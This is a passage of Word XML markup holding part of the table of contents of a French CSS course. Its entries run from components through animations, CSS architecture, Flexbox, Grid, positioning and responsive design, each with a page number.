        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.3 Variantes et modificateurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>156</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.4 Cartes et contenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>156</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.5 Alertes et messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>157</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.6 Organiser une bibliothèque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>158</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16. Transitions et animations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>163</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.1 Trois mécanismes distincts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>163</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.2 Ce qu'il faut animer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>163</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.3 Courbes et durées</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>164</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.4 Animations déclaratives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.5 Mouvement et accessibilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>16.6 Diagnostiquer une animation saccadée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie III — Mise en page moderne et accessibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17. Architecture CSS et conception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>171</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.1 Pourquoi l'architecture compte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>172</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.2 Organiser les fichiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.3 Conventions de nommage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.4 Jetons de conception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>174</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.5 Isoler les composants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>174</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>17.6 Mesurer et nettoyer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>175</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18. Flexbox : aligner sur un axe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>180</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18.1 Le modèle mental</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>180</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18.2 Aligner : les combinaisons utiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>181</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18.3 Flexibilité et rétrécissement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>182</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18.4 Cas d'usage typiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>182</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>18.5 Flexbox ou Grid ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>183</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19. CSS Grid : structurer la page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19.1 Déclarer une grille</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>188</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19.2 Unités et fonctions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>189</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19.3 Placer les éléments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>189</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19.4 Construire une page complète</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>190</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>19.5 Pièges et diagnostics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>191</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20. Positionnement et couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>196</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.1 Cinq valeurs de position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>196</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.2 Sticky : figer au bon moment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>197</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.3 Empilement et z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>197</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.4 Menus déroulants accessibles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>198</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.5 Fenêtre modale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>20.6 Diagnostiquer un positionnement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21. Design responsive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.1 Pourquoi le responsive n'est pas une mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.2 Mobile-first</w:t>
